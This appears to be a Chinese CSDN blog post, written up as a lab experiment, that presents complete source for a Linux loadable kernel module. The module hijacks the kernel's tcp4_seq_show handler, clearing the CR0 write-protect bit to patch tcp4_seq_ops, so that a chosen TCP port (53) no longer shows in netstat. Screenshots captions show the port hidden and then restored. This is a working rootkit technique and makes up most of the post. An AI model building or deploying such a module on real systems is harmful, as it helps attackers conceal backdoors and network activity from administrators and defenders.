linux系统调用劫持(隐藏端口)

最新推荐文章于 2024-05-28 09:56:05 发布
最新推荐文章于 2024-05-28 09:56:05 发布
阅读量1.3k 收藏 6
点赞数 1
文章标签: 内核 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44858076/article/details/112878151
版权

一、实验目的

修改linux内核读取tcp端口所使用的函数调用tcp4_seq_show,让其指向自己的函数,用于隐藏指定的端口号。
使用的linux内核版本如下:
在这里插入图片描述

二、实验代码

#include <linux/module.h>
#include <linux/kallsyms.h>
#include <linux/kernel.h>
#include <linux/unistd.h>
#include <linux/string.h>
#include <linux/seq_file.h>

MODULE_LICENSE("GPL");
MODULE_DESCRIPTION("Access non-exported symbols");
MODULE_AUTHOR("Tzyy");

#define TMPSZ 150
#define PORT_TO_HIDE 53	//想要隐藏的目标端口

struct seq_operations *tcp4_seq_ops_ptr = NULL;
typedef int (*tcp4_seq_show_ptr) (struct seq_file *m, void *v);
tcp4_seq_show_ptr old_tcp4_seq_show = NULL;
tcp4_seq_show_ptr tmp = NULL;

int my_tcp4_seq_show(struct seq_file *seq, void *v)
{
	printk("System call inerception strated!\n");
	
	int old_val = (*old_tcp4_seq_show) (seq, v);
	char port[12];
	sprintf(port,"%04X",PORT_TO_HIDE);
	if(strnstr(seq->buf+seq->count-TMPSZ,port,TMPSZ)) {
		seq->count -= TMPSZ;
	}
	
	printk("Hack completed!\n");
	return old_val;
}

static inline void write_cr0_forced(unsigned long val)
{
    unsigned long __force_order;

    /* __asm__ __volatile__( */
    asm volatile(
        "mov %0, %%cr0"
        : "+r"(val), "+m"(__force_order));
}

static inline void protect_memory(void)
{
    unsigned long cr0 = read_cr0();
    write_cr0_forced(cr0);
}

static inline void unprotect_memory(void)
{
    unsigned long cr0 = read_cr0();
    write_cr0_forced(cr0 & ~0x00010000);
}

static int __init lkm_init(void)
{
    unsigned long _tcp4_seq_show = kallsyms_lookup_name("tcp4_seq_show");

	//获得tcp4_seq_ops函数指针,用于之后将读取tcp端口的tcp4_seq_show修改成指向自己的定义的函数 
	tcp4_seq_ops_ptr = (struct seq_operations *) kallsyms_lookup_name("tcp4_seq_ops");
	old_tcp4_seq_show = (tcp4_seq_show_ptr) kallsyms_lookup_name("tcp4_seq_show");

	if(!_tcp4_seq_show){
		printk("Can't get address of tcp4_seq_show\n");
		return 0;	
	} 
	
	//打印tcp4_seq_show的内存地址
	printk(KERN_INFO "[%s] tcp4_seq_show (0x%lx)\n", __this_module.name, _tcp4_seq_show);
	printk("Let's hack it!\n");
	
	//修改tcp4_seq_ops所引用的show函数为自己的函数
	if (old_tcp4_seq_show != NULL){	
		unprotect_memory();
		tcp4_seq_ops_ptr->show = (tcp4_seq_show_ptr)(&my_tcp4_seq_show);
		protect_memory();
	}

	return 0;
}


//在卸载模块的时候,将tcp4_seq_ops指向的show函数改回原来的函数
static void __exit lkm_exit(void)
{
	unprotect_memory();
	tcp4_seq_ops_ptr->show = old_tcp4_seq_show;
	protect_memory();
}

module_init(lkm_init);
module_exit(lkm_exit);

三、实验结果

使用 sudo netstat -tnlp | grep :53可以查找到目标端口53
在这里插入图片描述
将编译好的内核模块插入内核
在这里插入图片描述
再次查找就已经无法找到了
在这里插入图片描述
输入dmesg可以看到LKM运行信息
在这里插入图片描述
输入sudo rmmod port_hide移除内核模块后再次查找,又可以重新找到了
在这里插入图片描述

tzy577
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
linux端口复用隐藏后门
m0_46799123的博客
09-14 478
端口复用实验
如何在 Linux/Unix/Windows 中发现隐藏的进程和端口
01-31 1437
英文:Vivek Gite,翻译:Linux中国/fan Lilinux.cn/article-9288-1.htmlunhide 是一个小巧的网络取证工具,能够发现那些借助 rootkit、LKM 及其它技术隐藏的进程和 TCP/UDP 端口。这个工具在 Linux、UNIX 类、MS-Windows 等操作系统下都可以工作。根据其 man 页面的说明:Unhide 通过下述三项技术来发现隐藏
Unix查看oracle端口,技术|如何在 Linux/Unix/Windows 中发现隐藏的进程和端口
weixin_33364945的博客
04-03 184
unhide 是一个小巧的网络取证工具,能够发现那些借助 rootkit、LKM 及其它技术隐藏的进程和 TCP/UDP 端口。这个工具在 Linux、UNIX 类、MS-Windows 等操作系统下都可以工作。根据其 man 页面的说明:Unhide 通过下述三项技术来发现隐藏的进程。进程相关的技术,包括将 /proc 目录与 /bin/ps 命令的输出进行比较。系统相关的技术,包括将 /bin...
linux安全配置-将ssh服务隐藏于Internet(端口碰撞)
weixin_33778544的博客
06-09 120
一:设备信息 要保护的服务器:ubuntu14.04 192.168.1.38 ssh测试机:kali2.0 192.168.1.47 二:配置过程 1.首先扫描一下未进行knockd配置的服务器的端口状况: 由上面可知该服务器开启了SSH端口 2.在服务器(192.168.1.38)下载并配置knockd 1)安装knockd ...
Linux rootkit之隐藏TCP端口和检测
小立仔
07-17 1996
Linux rootkit之隐藏TCP端口和检测
linux系统调用实验一条龙.rar
12-31
题目:在Linux内核中增加一个系统调用,并编写对应的Linux应用程序。利用该系统调用能够遍历系统当前所有进程的任务描述符,并按进程父子关系将这些描述符所对应的进程id(PID)组织成树形结构显示。 说明:代码有...
三种方法实现Linux系统调用
09-15
主要介绍了三种方法实现Linux系统调用,感兴趣的朋友可以参考一下
Linux系统调用.pdf
01-27
常见的linux系统调用流程梳理
Linux系统调用.ppt
11-21
Linux系统调用.ppt
操作系统-linux系统调用.doc
11-15
操作系统-linux系统调用.doc
linux TCP UDP 端口映射 及DNS劫持
weixin_34072637的博客
09-25 518
对于linux下的端口映射问题多出现在使用linux做为网关路由,用来连接ISP使用时并把公司的内网IP地址NAT成ISP提供的IP。保证内网所有主机可以共享一个公网IP来访问internet。但这样做的同时也会带来一个问题就是我们无法在办公室以后的网络中访问或管理我们内网的服务器。要解决这个问题就要在linux网关服务器上将ISP提供的IP的相关端口通过DNAT方式映...
linux查看进程_Linux下的几种隐藏技术
weixin_39622710的博客
10-21 410
0x00 前言攻击者在获取服务器权限后,会通过一些技巧来隐藏自己的踪迹和后门文件,本文介绍Linux下的几种隐藏技术。0x01 隐藏文件Linux 下创建一个隐藏文件:touch .test.txt touch 命令可以创建一个文件,文件名前面加一个 点 就代表是隐藏文件,如下图:一般的Linux下的隐藏目录使用命令ls -l是查看不出来的,只能查看到文件及文件夹,查看Linux下的隐藏文件需要...
linux系统如何修改ssh的端口号,并修改隐藏ip被不被外界ping通
weixin_41831919的博客
01-05 866
linux系统如何修改ssh的端口号 修改ssh配置文件 vim /etc/ssh/sshd_config 可使用vim打开 使用ppy快速复制本行记录并修改端口号 重启sshd服务使其生效 systemctl restart sshd 查看ssh开放的端口信息,此时连接两个端口均可ssh连接 netstat -ltnp |grep ssh 在linux里,如果要想使ping没反应也就是用来忽略icmp包,因此我们可以在Linux的命令行中输入如下命令 echo 1 &g.
Linux劫持connect到指定IP地址
pmunix的专栏
11-30 2744
    3.1.1  Linux系统调用原理        每个系统调用都是通过一个单一的入口点多路传入内核。eax 寄存器用来标识应当调用的某个系统调用,这在 C 库中做了指定(来自用户空间应用程序的每个调用)。当加载了系统的 C 库调用索引和参数时,就会调用一个软件中断(0x80 中断),它将执行 system_call 函数(通过中断处理程序),这个函
PortHidDemo_Vista
08-01 1371
///////////////////////////////////////////////////////////////////////////////////////// Filename: PortHidDemo_Vista.c// // Author: CardMagic(Edward)// Email: sunmy1@sina.com// MSN:  onlyonejazz at h
linux协议栈劫持,劫持TCP不一定非要是中间人
weixin_42355387的博客
05-15 127
导读Hi,我是Robert,上回说到我费了老大劲才考上了Linux帝国的公务员,被分配到了网络部协议栈大厦的传输层工作。TCP的初始序列号Hi,我是Robert,上回说到我费了老大劲才考上了Linux帝国的公务员,被分配到了网络部协议栈大厦的传输层工作。上班第一天,主管就让我处理一个新的TCP连接练练手。虽然我理论背的滚瓜烂熟,不过还没有实际上手处理过TCP数据包,竟有些紧张起来。接过这个请求连接...
【应急基础】————3、mount-bind隐藏端口和进程
Fly_鹏程万里
02-22 1002
创建文件夹 挂不上,一想是因为前几天测试sudo提权的时候把selinux打开了 然后再看一下,ps和netstat看不到了。 大小变成了4096 修复: 检查mount: 1)/proc/mounts 2)/proc/$$/mountinfo [root@server120 tmp]# cat /proc/$$/mountinfo | grep 353...
协议Jiurl255 技术参考
FreeXploiT
12-01 1407
这是一种很特殊的方法,使用它通讯没有端口,而且由于它的特殊性,也许会带来一些其他的优点。但这种方法也有一个比较大的缺点。    它,也许该起个名字,比如叫Jiurl255。它不使用tcp协议,也不使用udp协议,也不使用icmp协议。它使用什么协议,就像乱起的那个名字一样,它使用255协议。 上面这幅图,是一个没有IP选项的IP头。其中有个字段为8位协议,一个字节长,系统就是通过这个字节
linux 之dma_buf (4)- mmap
最新发布
z20230508的博客
05-28 603
前面几篇都是在 kernel space 对 dma-buf 进行访问的,本篇我们将一起来学习,如何在 user space 访问 dma-buf。当然,user space 访问 dma-buf 也属于 CPU Access 的一种。
编写Linux系统调用
09-23
2. 定义系统调用编号:Linux内核为每个系统调用分配一个唯一的编号,称为系统调用号。需要为新的系统调用分配一个未被使用的系统调用号。 3. 编写系统调用函数:在内核源码中编写实现系统调用功能的函数。可以通过...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值